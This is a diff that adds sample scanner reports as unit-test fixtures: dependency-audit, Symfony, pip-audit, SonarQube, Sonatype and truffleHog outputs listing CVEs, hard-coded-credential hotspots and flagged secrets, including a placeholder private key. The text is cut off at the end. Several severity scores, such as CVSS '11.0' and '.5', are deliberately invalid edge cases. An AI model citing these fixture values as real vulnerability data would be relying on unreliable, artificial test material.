"Vulnerabilities": [{ + "id": "422fd048-4155-4213-8126-75b4c3135820", + "title": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "cvssScore": "9.5", + "cvssVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cwe": "CWE-79", + "reference": "https://ossindex.sonatype.org/vuln/422fd048-4155-4213-8126-75b4c3135820?component-type=npm&component-name=react-dom&utm_source=devaudit&utm_medium=integration&utm_content=3.4" + } + ] + }] +} diff --git a/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_severity_high.json b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_severity_high.json new file mode 100644 index 00000000000..5e5cbe0af61 --- /dev/null +++ b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_severity_high.json @@ -0,0 +1,24 @@ +{ + "Packages Audited": 1, + "Vulnerabilities Found": 1, + "Packages": [ + { + "Package": { + "pm": "npm", + "group": "None", + "name": "react-dom", + "version": "16.4.1", + "vendor": "None" + }, + "Vulnerabilities": [{ + "id": "422fd048-4155-4213-8126-75b4c3135820", + "title": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "cvssScore": "8.0", + "cvssVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cwe": "CWE-79", + "reference": "https://ossindex.sonatype.org/vuln/422fd048-4155-4213-8126-75b4c3135820?component-type=npm&component-name=react-dom&utm_source=devaudit&utm_medium=integration&utm_content=3.4" + } + ] + }] +} diff --git a/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_severity_info.json b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_severity_info.json new file mode 100644 index 00000000000..82572e9d144 --- /dev/null +++ b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_severity_info.json @@ -0,0 +1,41 @@ +{ + "Packages Audited": 1, + "Vulnerabilities Found": 1, + "Packages": [ + { + "Package": { + "pm": "npm", + "group": "None", + "name": "react-dom", + "version": "16.4.1", + "vendor": "None" + }, + "Vulnerabilities": [{ + "id": "422fd048-4155-4213-8126-75b4c3135820", + "title": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "cvssScore": "", + "cvssVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cwe": "CWE-79", + "reference": "https://ossindex.sonatype.org/vuln/422fd048-4155-4213-8126-75b4c3135820?component-type=npm&component-name=react-dom&utm_source=devaudit&utm_medium=integration&utm_content=3.4" + }, + { + "id": "422fd048-4155-4213-8126-75b4c3135820", + "title": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "cvssScore": "11.0", + "cvssVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cwe": "CWE-79", + "reference": "https://ossindex.sonatype.org/vuln/422fd048-4155-4213-8126-75b4c3135820?component-type=npm&component-name=react-dom&utm_source=devaudit&utm_medium=integration&utm_content=3.4" + }, + { + "id": "422fd048-4155-4213-8126-75b4c3135820", + "title": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "cvssVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cwe": "CWE-79", + "reference": "https://ossindex.sonatype.org/vuln/422fd048-4155-4213-8126-75b4c3135820?component-type=npm&component-name=react-dom&utm_source=devaudit&utm_medium=integration&utm_content=3.4" + } + ] + }] +} diff --git a/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_severity_low.json b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_severity_low.json new file mode 100644 index 00000000000..29a08d9546d --- /dev/null +++ b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_severity_low.json @@ -0,0 +1,24 @@ +{ + "Packages Audited": 1, + "Vulnerabilities Found": 1, + "Packages": [ + { + "Package": { + "pm": "npm", + "group": "None", + "name": "react-dom", + "version": "16.4.1", + "vendor": "None" + }, + "Vulnerabilities": [{ + "id": "422fd048-4155-4213-8126-75b4c3135820", + "title": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "cvssScore": ".5", + "cvssVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cwe": "CWE-79", + "reference": "https://ossindex.sonatype.org/vuln/422fd048-4155-4213-8126-75b4c3135820?component-type=npm&component-name=react-dom&utm_source=devaudit&utm_medium=integration&utm_content=3.4" + } + ] + }] +} diff --git a/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_severity_medium.json b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_severity_medium.json new file mode 100644 index 00000000000..5f57488c06e --- /dev/null +++ b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_severity_medium.json @@ -0,0 +1,24 @@ +{ + "Packages Audited": 1, + "Vulnerabilities Found": 1, + "Packages": [ + { + "Package": { + "pm": "npm", + "group": "None", + "name": "react-dom", + "version": "16.4.1", + "vendor": "None" + }, + "Vulnerabilities": [{ + "id": "422fd048-4155-4213-8126-75b4c3135820", + "title": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "cvssScore": "5.0", + "cvssVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cwe": "CWE-79", + "reference": "https://ossindex.sonatype.org/vuln/422fd048-4155-4213-8126-75b4c3135820?component-type=npm&component-name=react-dom&utm_source=devaudit&utm_medium=integration&utm_content=3.4" + } + ] + }] +} diff --git a/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_vuln_no_cvssscore.json b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_vuln_no_cvssscore.json new file mode 100644 index 00000000000..3eaf1ad0689 --- /dev/null +++ b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_vuln_no_cvssscore.json @@ -0,0 +1,24 @@ +{ + "Packages Audited": 1, + "Vulnerabilities Found": 1, + "Packages": [ + { + "Package": { + "pm": "npm", + "group": "None", + "name": "react-dom", + "version": "16.4.1", + "vendor": "None" + }, + "Vulnerabilities": [{ + "id": "422fd048-4155-4213-8126-75b4c3135820", + "title": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "cvssScore": "", + "cvssVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cwe": "CWE-79", + "reference": "https://ossindex.sonatype.org/vuln/422fd048-4155-4213-8126-75b4c3135820?component-type=npm&component-name=react-dom&utm_source=devaudit&utm_medium=integration&utm_content=3.4" + } + ] + }] +} diff --git a/unittests/scans/php_symfony_security_check_sample/php_symfony_many_vuln.json b/unittests/scans/php_symfony_security_check_sample/php_symfony_many_vuln.json new file mode 100644 index 00000000000..1d8e8cfad48 --- /dev/null +++ b/unittests/scans/php_symfony_security_check_sample/php_symfony_many_vuln.json @@ -0,0 +1,77 @@ +{ + "symfony/cache": { + "version": "v3.4.16", + "advisories": [ + { + "title": "CVE-2019-10912: Prevent destructors with side-effects from being unserialized", + "link": "https://symfony.com/cve-2019-10912", + "cve": "CVE-2019-10912" + } + ] + }, + "symfony/dependency-injection": { + "version": "v3.4.16", + "advisories": [ + { + "title": "CVE-2019-10910: Check service IDs are valid", + "link": "https://symfony.com/cve-2019-10910", + "cve": "CVE-2019-10910" + } + ] + }, + "symfony/form": { + "version": "v3.4.16", + "advisories": [ + { + "title": "CVE-2018-19789: Temporary uploaded file path disclosure", + "link": "https://symfony.com/cve-2018-19789", + "cve": "CVE-2018-19789" + } + ] + }, + "symfony/framework-bundle": { + "version": "v3.4.16", + "advisories": [ + { + "title": "CVE-2019-10909: Escape validation messages in the PHP templating engine", + "link": "https://symfony.com/cve-2019-10909", + "cve": "CVE-2019-10909" + } + ] + }, + "symfony/http-foundation": { + "version": "v3.4.16", + "advisories": [ + { + "title": "CVE-2019-10913: Reject invalid HTTP method overrides", + "link": "https://symfony.com/cve-2019-10913", + "cve": "CVE-2019-10913" + } + ] + }, + "symfony/security": { + "version": "v3.4.16", + "advisories": [ + { + "title": "CVE-2018-19790: Open Redirect Vulnerability on login", + "link": "https://symfony.com/cve-2018-19790", + "cve": "CVE-2018-19790" + }, + { + "title": "CVE-2019-10911: Add a separator in the remember me cookie hash", + "link": "https://symfony.com/cve-2019-10911", + "cve": "CVE-2019-10911" + } + ] + }, + "twig/twig": { + "version": "v2.5.0", + "advisories": [ + { + "title": "Sandbox Information Disclosure", + "link": "https://symfony.com/blog/twig-sandbox-information-disclosure", + "cve": "" + } + ] + } +} \ No newline at end of file diff --git a/unittests/scans/php_symfony_security_check_sample/php_symfony_no_vuln.json b/unittests/scans/php_symfony_security_check_sample/php_symfony_no_vuln.json new file mode 100644 index 00000000000..9e26dfeeb6e --- /dev/null +++ b/unittests/scans/php_symfony_security_check_sample/php_symfony_no_vuln.json @@ -0,0 +1 @@ +{} \ No newline at end of file diff --git a/unittests/scans/php_symfony_security_check_sample/php_symfony_one_vuln.json b/unittests/scans/php_symfony_security_check_sample/php_symfony_one_vuln.json new file mode 100644 index 00000000000..5705fa493f9 --- /dev/null +++ b/unittests/scans/php_symfony_security_check_sample/php_symfony_one_vuln.json @@ -0,0 +1,12 @@ +{ + "twig/twig": { + "version": "v2.5.0", + "advisories": [ + { + "title": "Sandbox Information Disclosure", + "link": "https://symfony.com/blog/twig-sandbox-information-disclosure", + "cve": "" + } + ] + } +} \ No newline at end of file diff --git a/unittests/scans/pip-audit/empty.json b/unittests/scans/pip-audit/empty.json new file mode 100644 index 00000000000..0d4f101c7a3 --- /dev/null +++ b/unittests/scans/pip-audit/empty.json @@ -0,0 +1,2 @@ +[ +] diff --git a/unittests/scans/pip-audit/many_vulns.json b/unittests/scans/pip-audit/many_vulns.json new file mode 100644 index 00000000000..be99c415fd0 --- /dev/null +++ b/unittests/scans/pip-audit/many_vulns.json @@ -0,0 +1,89 @@ +[ + { + "name": "adal", + "version": "1.2.2", + "vulns": [] + }, + { + "name": "aiohttp", + "version": "3.6.2", + "vulns": [ + { + "id": "PYSEC-2021-76", + "fix_versions": [ + "3.7.4" + ], + "description": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. In aiohttp before version 3.7.4 there is an open redirect vulnerability. A maliciously crafted link to an aiohttp-based web-server could redirect the browser to a different website. It is caused by a bug in the `aiohttp.web_middlewares.normalize_path_middleware` middleware. This security problem has been fixed in 3.7.4. Upgrade your dependency using pip as follows \"pip install aiohttp >= 3.7.4\". If upgrading is not an option for you, a workaround can be to avoid using `aiohttp.web_middlewares.normalize_path_middleware` in your applications." + } + ] + }, + { + "name": "alabaster", + "version": "0.7.12", + "vulns": [] + }, + { + "name": "azure-devops", + "skip_reason": "Dependency not found on PyPI and could not be audited: azure-devops (0.17.0)" + }, + { + "name": "django", + "version": "3.2.9", + "vulns": [ + { + "id": "PYSEC-2021-439", + "fix_versions": [ + "2.2.25", + "3.1.14", + "3.2.10" + ], + "description": "In Django 2.2 before 2.2.25, 3.1 before 3.1.14, and 3.2 before 3.2.10, HTTP requests for URLs with trailing newlines could bypass upstream access control based on URL paths." + } + ] + }, + { + "name": "lxml", + "version": "4.6.4", + "vulns": [ + { + "id": "PYSEC-2021-852", + "fix_versions": [], + "description": "lxml is a library for processing XML and HTML in the Python language. Prior to version 4.6.5, the HTML Cleaner in lxml.html lets certain crafted script content pass through, as well as script content in SVG files embedded using data URIs. Users that employ the HTML cleaner in a security relevant context should upgrade to lxml 4.6.5 to receive a patch. There are no known workarounds available." + } + ] + }, + { + "name": "twisted", + "version": "18.9.0", + "vulns": [ + { + "id": "PYSEC-2019-128", + "fix_versions": [ + "19.2.1" + ], + "description": "In Twisted before 19.2.1, twisted.web did not validate or sanitize URIs or HTTP methods, allowing an attacker to inject invalid characters such as CRLF." + }, + { + "id": "PYSEC-2020-260", + "fix_versions": [ + "20.3.0rc1" + ], + "description": "In Twisted Web through 19.10.0, there was an HTTP request splitting vulnerability. When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted as a pipelined request." + }, + { + "id": "PYSEC-2019-129", + "fix_versions": [ + "19.7.0rc1" + ], + "description": "In words.protocols.jabber.xmlstream in Twisted through 19.2.1, XMPP support did not verify certificates when used with TLS, allowing an attacker to MITM connections." + }, + { + "id": "PYSEC-2020-259", + "fix_versions": [ + "20.3.0rc1" + ], + "description": "In Twisted Web through 19.10.0, there was an HTTP request splitting vulnerability. When presented with two content-length headers, it ignored the first header. When the second content-length value was set to zero, the request body was interpreted as a pipelined request." + } + ] + } +] diff --git a/unittests/scans/pip-audit/zero_vulns.json b/unittests/scans/pip-audit/zero_vulns.json new file mode 100644 index 00000000000..af290020be1 --- /dev/null +++ b/unittests/scans/pip-audit/zero_vulns.json @@ -0,0 +1,16 @@ +[ + { + "name": "adal", + "version": "1.2.2", + "vulns": [] + }, + { + "name": "alabaster", + "version": "0.7.12", + "vulns": [] + }, + { + "name": "azure-devops", + "skip_reason": "Dependency not found on PyPI and could not be audited: azure-devops (0.17.0)" + } +] diff --git a/unittests/scans/sonarqube_api/hotspots/many_vulns.json b/unittests/scans/sonarqube_api/hotspots/many_vulns.json new file mode 100644 index 00000000000..291228c71fe --- /dev/null +++ b/unittests/scans/sonarqube_api/hotspots/many_vulns.json @@ -0,0 +1,28 @@ +[ + { + "key": "AXgm6Z-ophPPY0C1qhRq", + "component": "internal.dummy.project:spec/support/user_fixture.rb", + "project": "internal.dummy.project", + "securityCategory": "auth", + "vulnerabilityProbability": "HIGH", + "status": "TO_REVIEW", + "line": 9, + "message": "\"password\" detected here, make sure this is not a hard-coded credential.", + "author": "", + "creationDate": "2017-12-13T03:00:45+0000", + "updateDate": "2021-03-12T14:47:56+0000" + }, + { + "key": "AXgm6Z-ophPPY0C1qhR1", + "component": "internal.dummy.project:app/assets/javascripts/vuln.js", + "project": "internal.dummy.project", + "securityCategory": "auth", + "vulnerabilityProbability": "MEDIUM", + "status": "TO_REVIEW", + "line": 5, + "message": "\"password\" detected here, make sure this is not a hard-coded credential.", + "author": "", + "creationDate": "2017-12-13T03:00:45+0000", + "updateDate": "2021-03-12T14:47:56+0000" + } +] diff --git a/unittests/scans/sonarqube_api/hotspots/no_vuln.json b/unittests/scans/sonarqube_api/hotspots/no_vuln.json new file mode 100644 index 00000000000..fe51488c706 --- /dev/null +++ b/unittests/scans/sonarqube_api/hotspots/no_vuln.json @@ -0,0 +1 @@ +[] diff --git a/unittests/scans/sonarqube_api/hotspots/one_vuln.json b/unittests/scans/sonarqube_api/hotspots/one_vuln.json new file mode 100644 index 00000000000..5f210554fb4 --- /dev/null +++ b/unittests/scans/sonarqube_api/hotspots/one_vuln.json @@ -0,0 +1,15 @@ +[ + { + "key": "AXgm6Z-ophPPY0C1qhRq", + "component": "internal.dummy.project:spec/support/user_fixture.rb", + "project": "internal.dummy.project", + "securityCategory": "auth", + "vulnerabilityProbability": "HIGH", + "status": "TO_REVIEW", + "line": 9, + "message": "\"password\" detected here, make sure this is not a hard-coded credential.", + "author": "", + "creationDate": "2017-12-13T03:00:45+0000", + "updateDate": "2021-03-12T14:47:56+0000" + } +] diff --git a/unittests/scans/sonarqube_api/hotspots/rule.json b/unittests/scans/sonarqube_api/hotspots/rule.json new file mode 100644 index 00000000000..e57dca7e751 --- /dev/null +++ b/unittests/scans/sonarqube_api/hotspots/rule.json @@ -0,0 +1,9 @@ +{ + "key": "ruby:S2068", + "name": "Hard-coded credentials are security-sensitive", + "securityCategory": "auth", + "vulnerabilityProbability": "HIGH", + "riskDescription": "

    Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true\nfor applications that are distributed or that are open-source.

    \n

    In the past, it has led to the following vulnerabilities:

    \n\n

    Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

    \n

    This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection\nstrings, and for variable names that match any of the patterns from the provided list.

    \n

    It's recommended to customize the configuration of this rule with additional credential words such as \"oauthToken\", \"secret\", ...

    \n", + "vulnerabilityDescription": "

    Ask Yourself Whether

    \n
      \n
    • Credentials allows access to a sensitive component like a database, a file storage, an API or a service.
    • \n
    • Credentials are used in production environments.
    • \n
    • Application re-distribution is required before updating the credentials.
    • \n
    \n

    There is a risk if you answered yes to any of those questions.

    \n", + "fixRecommendations": "

    Recommended Secure Coding Practices

    \n
      \n
    • Store the credentials in a configuration file that is not pushed to the code repository.
    • \n
    • Store the credentials in a database.
    • \n
    • Use your cloud provider's service for managing secrets.
    • \n
    • If the a password has been disclosed through the source code: change it.
    • \n
    \n

    See

    \n" +} diff --git a/unittests/scans/sonarqube_api/issues.json b/unittests/scans/sonarqube_api/issues.json new file mode 100644 index 00000000000..f03bc642b64 --- /dev/null +++ b/unittests/scans/sonarqube_api/issues.json @@ -0,0 +1,96 @@ +[ + { + "key": "AWKWIl8pZpu0CyehMfc4", + "rule": "typescript:S1854", + "severity": "MAJOR", + "component": "internal.dummy.project:src/main/javascript/TranslateDirective.ts", + "project": "internal.dummy.project", + "line": 242, + "hash": "1c5dcad1e37da3215ff6366dce3054bc", + "textRange": { + "startLine": 242, + "endLine": 242, + "startOffset": 98, + "endOffset": 110 + }, + "flows": [ + ], + "status": "CONFIRMED", + "message": "Remove this useless assignment to local variable \"currentValue\".", + "effort": "15min", + "debt": "15min", + "author": "randomguy1@domain.com", + "tags": [ + "cert", + "cwe", + "unused" + ], + "creationDate": "2017-10-18T04:51:38-0400", + "updateDate": "2019-07-31T10:42:14-0400", + "type": "CODE_SMELL", + "organization": "default-organization", + "fromHotspot": false + }, + { + "key": "AWKWIl8pZpu0CyehMfc3", + "rule": "typescript:S1854", + "severity": "MAJOR", + "component": "internal.dummy.project:src/main/javascript/TranslateDirective.ts", + "project": "internal.dummy.project", + "line": 237, + "hash": "85282183a62571c437db451c4a08c970", + "textRange": { + "startLine": 237, + "endLine": 237, + "startOffset": 98, + "endOffset": 110 + }, + "flows": [ + ], + "resolution": "FALSE-POSITIVE", + "status": "RESOLVED", + "message": "Remove this useless assignment to local variable \"currentValue\".", + "effort": "15min", + "debt": "15min", + "author": "randomguy2@domain.com", + "tags": [ + "cert", + "cwe", + "unused" + ], + "creationDate": "2017-10-18T04:51:38-0400", + "updateDate": "2019-07-18T11:15:30-0400", + "type": "CODE_SMELL", + "organization": "default-organization", + "fromHotspot": false + }, + { + "key": "AWKWIlkyZpu0CyehMfb7", + "rule": "scss:unknown-type-selector", + "severity": "CRITICAL", + "component": "internal.dummy.project:src/main/javascript/ui/PrimaryAccordionComponent.scss", + "project": "internal.dummy.project", + "line": 1, + "hash": "6562ff4baceb0a79e45d821bee180b9f", + "textRange": { + "startLine": 1, + "endLine": 1, + "startOffset": 16, + "endOffset": 41 + }, + "flows": [ + ], + "status": "OPEN", + "message": "Remove this usage of the unknown \"bx-primary-accordion-item\" type selector.", + "effort": "10min", + "debt": "10min", + "author": "randomguy3@domain.com", + "tags": [ + ], + "creationDate": "2018-03-28T03:41:35-0400", + "updateDate": "2018-04-05T10:06:59-0400", + "type": "BUG", + "organization": "default-organization", + "fromHotspot": false + } +] diff --git a/unittests/scans/sonarqube_api/product.json b/unittests/scans/sonarqube_api/product.json new file mode 100644 index 00000000000..01ddf3b995f --- /dev/null +++ b/unittests/scans/sonarqube_api/product.json @@ -0,0 +1,9 @@ +{ + "organization": "default-organization", + "id": "AWKWIkUBC6VPUf009fsb", + "key": "internal.dummy.project", + "name": "project", + "qualifier": "TRK", + "visibility": "private", + "lastAnalysisDate": "2018-04-05T10:57:29-0400" +} diff --git a/unittests/scans/sonarqube_api/rule.json b/unittests/scans/sonarqube_api/rule.json new file mode 100644 index 00000000000..0d871776c37 --- /dev/null +++ b/unittests/scans/sonarqube_api/rule.json @@ -0,0 +1,35 @@ +{ + "key": "typescript:S1854", + "repo": "typescript", + "name": "Dead stores should be removed", + "createdAt": "2018-01-17T10:11:21-0500", + "htmlDesc": "

    A dead store happens when a local variable is assigned a value that is not read by any subsequent instruction. Calculating or retrieving a value\nonly to then overwrite it or throw it away, could indicate a serious error in the code. Even if it's not an error, it is at best a waste of resources.\nTherefore all calculated values should be used.

    \n

    Noncompliant Code Example

    \n
    \ni = a + b; // Noncompliant; calculation result not used before value is overwritten\ni = compute();\n
    \n

    Compliant Solution

    \n
    \ni = a + b;\ni += compute();\n
    \n

    Exceptions

    \n

    This rule ignores initializations to -1, 0, 1, null, true, false, \"\", [] and\n{}.

    \n

    See

    \n", + "mdDesc": "

    A dead store happens when a local variable is assigned a value that is not read by any subsequent instruction. Calculating or retrieving a value\nonly to then overwrite it or throw it away, could indicate a serious error in the code. Even if it's not an error, it is at best a waste of resources.\nTherefore all calculated values should be used.

    \n

    Noncompliant Code Example

    \n
    \ni = a + b; // Noncompliant; calculation result not used before value is overwritten\ni = compute();\n
    \n

    Compliant Solution

    \n
    \ni = a + b;\ni += compute();\n
    \n

    Exceptions

    \n

    This rule ignores initializations to -1, 0, 1, null, true, false, \"\", [] and\n{}.

    \n

    See

    \n", + "severity": "MAJOR", + "status": "READY", + "isTemplate": false, + "tags": [ + ], + "sysTags": [ + "cert", + "cwe", + "unused" + ], + "lang": "ts", + "langName": "TypeScript", + "params": [ + ], + "defaultDebtRemFnType": "CONSTANT_ISSUE", + "defaultDebtRemFnOffset": "15min", + "debtOverloaded": false, + "debtRemFnType": "CONSTANT_ISSUE", + "debtRemFnOffset": "15min", + "defaultRemFnType": "CONSTANT_ISSUE", + "defaultRemFnBaseEffort": "15min", + "remFnType": "CONSTANT_ISSUE", + "remFnBaseEffort": "15min", + "remFnOverloaded": false, + "scope": "MAIN", + "isExternal": false, + "type": "CODE_SMELL" +} diff --git a/unittests/scans/sonarqube_api/rule_wo_html_desc.json b/unittests/scans/sonarqube_api/rule_wo_html_desc.json new file mode 100644 index 00000000000..57a1313ec45 --- /dev/null +++ b/unittests/scans/sonarqube_api/rule_wo_html_desc.json @@ -0,0 +1,22 @@ +{ + "key": "typescript:S1854", + "repo": "typescript", + "name": "Dead stores should be removed", + "createdAt": "2018-01-17T10:11:21-0500", + "status": "READY", + "isTemplate": false, + "tags": [ + ], + "sysTags": [ + "cert", + "cwe", + "unused" + ], + "params": [ + ], + "debtOverloaded": false, + "remFnOverloaded": false, + "scope": "ALL", + "isExternal": true, + "type": "UNKNOWN" +} diff --git a/unittests/scans/sonatype/one_vuln.json b/unittests/scans/sonatype/one_vuln.json new file mode 100644 index 00000000000..985f8d90d92 --- /dev/null +++ b/unittests/scans/sonatype/one_vuln.json @@ -0,0 +1,69 @@ +{ + "components": [ + { + "hash": "212387a39088ecd3daff", + "componentIdentifier": { + "format": "maven", + "coordinates": { + "artifactId": "okhttp", + "classifier": "", + "extension": "jar", + "groupId": "com.squareup.okhttp", + "version": "2.6.0" + } + }, + "proprietary": false, + "matchState": "exact", + "pathnames": [ + "WEB-INF/lib/okhttp-2.6.0.jar" + ], + "licenseData": { + "declaredLicenses": [ + { + "licenseId": "Apache-2.0", + "licenseName": "Apache-2.0" + } + ], + "observedLicenses": [ + { + "licenseId": "Apache-2.0", + "licenseName": "Apache-2.0" + } + ], + "overriddenLicenses": [], + "status": "Open", + "effectiveLicenseThreats": [ + { + "licenseThreatGroupName": "Liberal", + "licenseThreatGroupLevel": 0, + "licenseThreatGroupCategory": "no-threat" + } + ] + }, + "securityData": { + "securityIssues": [ + { + "source": "cve", + "reference": "CVE-2016-2402", + "severity": 5.9, + "status": "Open", + "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2402", + "threatCategory": "severe" + }, + { + "source": "sonatype", + "reference": "sonatype-2018-0035", + "severity": 5.9, + "status": "Open", + "url": null, + "threatCategory": "severe" + } + ] + } + } + ], + "matchSummary": { + "totalComponentCount": 1011, + "knownComponentCount": 826 + } +} diff --git a/unittests/scans/trufflehog/many_vulns.json b/unittests/scans/trufflehog/many_vulns.json new file mode 100644 index 00000000000..ab6e96f3757 --- /dev/null +++ b/unittests/scans/trufflehog/many_vulns.json @@ -0,0 +1,64 @@ +{"branch": "origin/dev", "commit": "Fixed since_commit and tests (#219)\n\n* Fixed since_commit and tests\r\n\r\n* Updated testing comment\r\n\r\nCo-authored-by: Dylan Ayrey ", "commitHash": "288f35ed2e73145e3578207e896a4cf1600bea45", "date": "2021-01-30 19:50:09", "diff": "@@ -30,12 +30,12 @@ class TestStringMethods(unittest.TestCase):\n self.fail(\"Unicode print error\")\n \n def test_return_correct_commit_hash(self):\n- # Start at commit 202564cf776b402800a4aab8bb14fa4624888475, which \n+ # Start at commit d15627104d07846ac2914a976e8e347a663bbd9b, which \n # is immediately followed by a secret inserting commit:\n- # https://github.com/dxa4481/truffleHog/commit/d15627104d07846ac2914a976e8e347a663bbd9b\n- since_commit = '202564cf776b402800a4aab8bb14fa4624888475'\n- commit_w_secret = 'd15627104d07846ac2914a976e8e347a663bbd9b'\n- cross_valdiating_commit_w_secret_comment = 'Oh no a secret file'\n+ # https://github.com/dxa4481/truffleHog/commit/9ed54617547cfca783e0f81f8dc5c927e3d1e345\n+ since_commit = 'd15627104d07846ac2914a976e8e347a663bbd9b'\n+ commit_w_secret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'\n+ cross_valdiating_commit_w_secret_comment = 'OH no a secret'\n \n json_result = ''\n if sys.version_info >= (3,):\n@@ -54,8 +54,7 @@ class TestStringMethods(unittest.TestCase):\n \n json_result_list = tmp_stdout.getvalue().split('\\n')\n results = [json.loads(r) for r in json_result_list if bool(r.strip())]\n- filtered_results = list(filter(lambda r: r['commitHash'] == commit_w_secret and r['branch'] == 'origin/master', results))\n-\n+ filtered_results = list(filter(lambda r: r['commitHash'] == commit_w_secret, results))\n self.assertEqual(1, len(filtered_results))\n self.assertEqual(commit_w_secret, filtered_results[0]['commitHash'])\n # Additionally, we cross-validate the commit comment matches the expected comment\n", "path": "test_all.py", "printDiff": "\u001b[93msecret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'\u001b[0m", "reason": "Generic Secret", "stringsFound": ["secret = 'd15627104d07846ac2914a976e8e347a663bbd9b'", "secret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'"]} +{"branch": "origin/dev", "commit": "Add allow list for known secrets (#223)\n\n* Include allow list\r\n\r\n* Make newlines in allow list flexible\r\n\r\n* Allow literals as well as regex in allow list\r\n\r\n* Fix flexible newline regex\r\n\r\n* Escape ALL THE THINGS\r\n\r\n* Detect \"\\\" and \"\\\", simplify newline regex, allow diff chars after newlines\r\n\r\n- re.escape also puts `\\` in front of `` and ``, so account for that in the replacement.\r\n- simplify newline replacement regex (and make slightly more flexible)\r\n- detect leading + / - at start of diff lines", "commitHash": "caa709db5b599dbe67afbad2eee4ae632cc3c12e", "date": "2021-01-30 19:38:57", "diff": "@@ -71,23 +71,13 @@ Feel free to also contribute high signal regexes upstream that you think will be\n \n trufflehog's base rule set sources from https://github.com/dxa4481/truffleHogRegexes/blob/master/truffleHogRegexes/regexes.json\n \n-To explicitly allow particular secrets (e.g. self-signed keys used only for local testing) you can provide an allow list `--allow /path/to/allow` in the following format:\n-```\n-{\n- \"local self signed test key\": \"-----BEGIN EC PRIVATE KEY-----\\nfoobar123\\n-----END EC PRIVATE KEY-----\",\n- \"git cherry pick SHAs\": \"regex:Cherry picked from .*\",\n-}\n-```\n-\n-Note that values beginning with `regex:` will be used as regular expressions. Values without this will be literal, with some automatic conversions (e.g. flexible newlines).\n-\n ## How it works\n This module will go through the entire commit history of each branch, and check each diff from each commit, and check for secrets. This is both by regex and by entropy. For entropy checks, truffleHog will evaluate the shannon entropy for both the base64 char set and hexidecimal char set for every blob of text greater than 20 characters comprised of those character sets in each diff. If at any point a high entropy string >20 characters is detected, it will print to the screen.\n \n ## Help\n \n ```\n-usage: trufflehog [-h] [--json] [--regex] [--rules RULES] [--allow ALLOW]\n+usage: trufflehog [-h] [--json] [--regex] [--rules RULES]\n [--entropy DO_ENTROPY] [--since_commit SINCE_COMMIT]\n [--max_depth MAX_DEPTH]\n git_url\n@@ -102,7 +92,6 @@ optional arguments:\n --json Output in JSON\n --regex Enable high signal regex checks\n --rules RULES Ignore default regexes and source from json list file\n- --allow ALLOW Explicitly allow regexes from json list file\n --entropy DO_ENTROPY Enable entropy checks\n --since_commit SINCE_COMMIT\n Only scan from a given commit hash\n", "path": "README.md", "printDiff": "\u001b[93m-----BEGIN EC PRIVATE KEY-----\u001b[0m", "reason": "SSH (EC) private key", "stringsFound": ["-----BEGIN EC PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "resolving merge conflicts\n", "commitHash": "466cdc94b4fcb0acd1904726a9b4de5c26e9125d", "date": "2019-05-06 07:47:40", "diff": "@@ -4,32 +4,6 @@ via 